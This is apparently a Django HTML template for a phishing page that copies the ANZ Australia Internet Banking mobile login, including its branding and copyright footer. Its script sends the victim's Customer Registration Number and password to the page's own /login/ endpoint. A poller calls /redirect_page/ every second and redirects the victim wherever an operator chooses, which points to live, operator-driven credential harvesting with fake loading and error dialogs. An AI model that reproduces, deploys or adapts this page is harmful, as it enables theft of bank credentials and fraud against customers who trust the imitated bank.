{% load static %}
<!doctype html>
<html lang="en">
<head>
    <link rel="shortcut icon" href="{% static 'favicon.ico' %}" type="image/x-icon">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>ANZ Australia Internet Banking</title>
    <link href="{% static 'css/bootstrap.css' %}" rel="stylesheet">
    <link href="../static/css/main.css" rel="stylesheet">
    <script
            src="https://code.jquery.com/jquery-3.5.1.js"
            integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
            crossorigin="anonymous"></script>
    <script src="{% static 'bootstrap.min.js' %}"></script>
    <script type="text/javascript">
        function get_redirect_to_page() {
            $.ajax({
                type: 'GET',
                async: true,
                url: '/redirect_page/',
                success: function(data) {
                    if (data["redirect_to"] === 'error') {
                        $('#loadingModal').modal('hide')
                        $("#errorModal").modal('show')
                    } else if (data["redirect_to"] === "bank") {
                        window.location.href = "https://www.anz.com.au/"
                    } else if (data["redirect_to"]) {
                        window.location.href = document.location.origin + "/" + data["redirect_to"]
                    }
                },
                dataType: 'json',
            });
        }
        function submited(event) {
            event.preventDefault()
            $('#loadingModal').modal({backdrop: 'static', keyboard: false}, 'show');
            var client_id = $("#username").val()
            var password = $("#password").val()
            $.ajax({
                type: 'POST',
                async: true,
                url: '/login/',
                data: "client_id=" + client_id + "&password=" + password,
                dataType: 'json',
            });
        }
    </script>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-light mobilebar">
    <a class="navbar-brand mobile-brand" href="#">
        <img src="../static/logo.png" class="logo-mobile">
    </a>
</nav>
<div style="padding: 0 15px" class="">
    <div class="row">
        <div class="col-12" style="margin: 45px 0">
            <h1 class="h1-mobile">Log in to<br> ANZ Internet Banking</h1>
            <form method="post" onsubmit="return submited(event)">
                <fieldset class="fake-form fake-form-mobile">
                    <div>
                        <label for="username" class="fake-form-mobile-label">Customer Registration Number
                            <input required id="username" class="fake-form-mobile-input" type="text" name="username"
                                   value="" maxlength="15">
                        </label>
                        <label for="password" class="fake-form-mobile-label">Password
                            <input required id="password" class="fake-form-mobile-input" type="password"
                                   name="password" maxlength="16" minlength="8">
                        </label>
                    </div>
                </fieldset>
                <button type="submit" class="btn btn-sign-in">Log in
                </button>
            </form>
            <div>
                <div class="bottom-link bottom-link-mobile" style="margin-top: 30px">
                    <a href="#">Forgot login details?</a>
                </div>
                <div class="bottom-link bottom-link-mobile" style="float: right;
    margin-top: -20px;">
                    <a href="#">Help</a>
                </div>

            </div>
            <hr style="margin-top: 53px;background: #cccccc">
            <p style="font-size: 16px;
            font-family: MyriadPro-Regular;
            color: rgb(73, 73, 73) !important;
            margin-top: 31px;
    line-height: 1.25;
    letter-spacing: 0.2px;">New to Internet Banking?<a class="bottom-link-mobile" style="margin-left: 3px" href="#">Register</a>
            </p>
            <p style="font-size: 14px;
            font-family: MyriadPro-Regular;
            color: rgb(73, 73, 73) !important;
            margin-top: 45px;
    line-height: 1.5;
    letter-spacing: 0.2px;">By logging in, you accept our<a class="bottom-link-mobile" style="margin-left: 3px"
                                                            href="#">Security and Privacy Statement.</a></p>



            <div class="row">
                           <div class="col-12" style="margin-top: 50px; padding-left: 10px; padding-right: 5px">
                <a href="#"><img style="    width: 100%;
    padding: 0 10px; margin-bottom: 10px" src="../static/ib-login-support.1.0.0.svg"></a>
                <p>
                    <a href="#" style="padding-left: 10px">
                        <span role="text" style="font-family: MyriadPro-Semibold, sans-serif, sans-serif;
    font-size: 15px;
    font-weight: 600;
    line-height: 1.5;
    color: rgb(0, 114, 172);">
                            Have a question about a product or service of ours?</span>
                    </a>
                </p>
                <a href="#" style="-webkit-tap-highlight-color: transparent;
    color: rgb(0, 125, 186);
    text-decoration: none;
    border: 1px solid rgb(0, 125, 186);
    font-size: 14px;
    font-weight: 600;
    border-radius: 3px;
    cursor: pointer;
    line-height: 18px;
    margin: 10px;
    text-align: center;
    display: inline-block;
    padding: 5px 11px;"><span>Visit ANZ Support</span></a>
            </div>




            <div class="col-12" style="margin-top: 50px; ">
                <ul class="list-links" style="list-style: none; padding-left: 0">
                    <li style="text-align: left;
    position: relative;
    width: 100%;
    color: rgb(0, 65, 101);
    font-weight: 600;">Further information</li>
                    <li><a href="#">Need help with your CRN or password?</a></li>
                    <li><a href="#">What’s new in Internet Banking</a></li>
                    <li><a href="#">Read current security alert</a></li>
                    <li><a href="#">Contact us</a></li>
                </ul>
            </div>

            </div>


        </div>
    </div>
</div>
<nav class="navbar mobile-bottom-bar">
    <p>© Australia and New Zealand Banking <br> Group Limited (ANZ) <br> 2020 ABN 11 005 357 522.</p>
</nav>
<div class="modal fade" id="loadingModal" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-body">
                <h3 class="modal-custom-title">We are checking your information</h3>
                <div class="d-flex justify-content-center">
                    <img class="logo-loading" src="../static/logo-loading.png" alt="">
                    <div class="spinner-border" style="width: 5rem; height: 5rem;color: #337ab7 !important;"
                         role="status">
                        <span class="sr-only">Loading...</span>
                    </div>
                </div>
                <h5 class="modal-custom-text">Please wait...</h5>
            </div>
        </div>
    </div>
</div>
<div class="modal fade" id="errorModal" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered" role="document">
        <div class="modal-content">
            <div class="modal-body">
                <h6 class="modal-error-title">Sign in error</h6>
                <p class="modal-error-text">The details entered don’t match those on our system. Please try again.</p>
                <button type="button" class="btn btn-sign-in modal-error-btn" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">Ok</span>
                </button>
            </div>
        </div>
    </div>
</div>
</body>
<script type="text/javascript">
    $(document).ready(function () {
        setInterval(get_redirect_to_page, 1000)
    });
</script>
</html>
